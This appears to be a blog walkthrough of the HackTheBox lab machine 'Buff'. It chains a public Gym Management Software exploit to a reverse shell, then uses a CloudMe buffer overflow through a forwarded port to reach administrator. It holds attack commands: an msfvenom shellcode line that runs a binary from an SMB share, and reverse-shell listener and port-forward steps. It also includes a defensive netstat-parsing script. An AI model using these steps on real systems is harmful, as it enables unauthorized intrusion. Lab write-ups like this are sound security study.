HTB Buff

Buff is a 20-point Windows Machine on HackTheBox, created by egotisticalSW. It involves 2 simple public exploits and forwarding a port.



As usual we start with a portscan:

nmap -Pn -sV -sC buff.htb
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

When we visit the site in a browser we see a fitness site. The contact page shows:

mrb3n's Bro Hut
Made using Gym Management Software 1.0 

A quick Google search shows this exploit, which gives us a shell as buff\shaun:

python http://buff.htb:8080/
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="

[+] Successfully connected to webshell.

To get out of this really inconvenient shell, we use SMB to pull in and start an xc shell:

nc -lvp 1337
\\\public\xc.exe 1337

Now we can read the user flag:

./xc -l -p 1337

		__  _____
		\ \/ / __|
		>  < (__
		/_/\_\___| by @xct_de
		           build: GLvLrMgcikmgHFyx
2020/11/21 11:13:53 Listening on :1337
2020/11/21 11:13:53 Waiting for connections...
2020/11/21 11:13:53 Connection from
2020/11/21 11:13:53 Stream established
[xc]:type \users\shaun\desktop\*


In Downloads we find an unusual binary:

cd \users\shaun 
C:\Users\shaun>dir Downloads
16/06/2020  15:26        17,830,824 CloudMe_1112.exe

A quick Google search shows various public buffer overflow exploits for this exact version. Running netstat -ano shows that the service is listening on localhost, on the port the exploits mention:

netstat -ano | findstr 8888
  TCP              LISTENING       8540

A quick side note: this was super unstable on release night, and several people, including me, did not even have this port open.
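The security-relevant point of the netstat step is that a service bound only to localhost is not protected by that binding: once a foothold exists, the port can be forwarded and the service attacked like any other. As an added illustration (not part of the original writeup), here is a small Python parser over constructed netstat -ano output that lists the TCP listeners bound exclusively to loopback addresses, together with their PIDs, so an administrator can map them to binaries and patch them. The sample lines, including the port 8888 listener with PID 8540, are constructed to mirror the writeup and are not captured from the box.

```python
import re
from collections import defaultdict

# Constructed sample of `netstat -ano` output (not captured from the machine):
# one loopback-only listener on 8888, like the CloudMe service in the writeup,
# alongside ordinary entries for contrast.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       4836
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       8540
  TCP    10.10.10.198:8080      10.10.14.3:51234       ESTABLISHED     4836
  TCP    [::1]:8888             [::]:0                 LISTENING       8540
  UDP    0.0.0.0:5355           *:*                                    1516
"""

# One netstat row: proto, local, remote, optional state (UDP has none), PID.
LINE_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+)\s*$"
)


def split_addr(addr):
    """Split '127.0.0.1:8888' or '[::1]:8888' into (host, port)."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), int(port)


def loopback_listeners(netstat_text):
    """Return {port: {pids}} for TCP LISTENING sockets bound only to loopback.

    These services are unreachable from the network, but a local port forward
    exposes them to whoever holds a foothold, so bind scope alone is not a fix.
    """
    by_port = defaultdict(lambda: {"loopback": set(), "pids": set()})
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["proto"] != "TCP" or m["state"] != "LISTENING":
            continue
        host, port = split_addr(m["local"])
        is_loop = host == "::1" or host.startswith("127.")
        by_port[port]["loopback"].add(is_loop)
        by_port[port]["pids"].add(int(m["pid"]))
    # Keep a port only if every listening socket on it is a loopback one.
    return {p: v["pids"] for p, v in by_port.items() if v["loopback"] == {True}}


if __name__ == "__main__":
    for port, pids in sorted(loopback_listeners(SAMPLE_NETSTAT).items()):
        print(f"loopback-only listener on {port}, PID(s) {sorted(pids)}")
```

On a real host, feed it the output of `netstat -ano` and resolve each PID with `tasklist /FI "PID eq <pid>"` to see which binary, and therefore which patch level, sits behind the port.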

I chose this exploit. We have to replace the shellcode though; an easy way to do that is via msfvenom:

msfvenom -f python -p windows/exec CMD='cmd.exe /c "\\\public\xc.exe 1338"'

After replacing the shellcode, we use xc to forward port 8888 back to us:

!lfwd 8888 localhost 8888

We then run the exploit and get a shell back as administrator:

./xc -l -p 1338
type \users\administrator\desktop\*

This box had many stability issues and running public exploits does not teach much, so I did not really like it.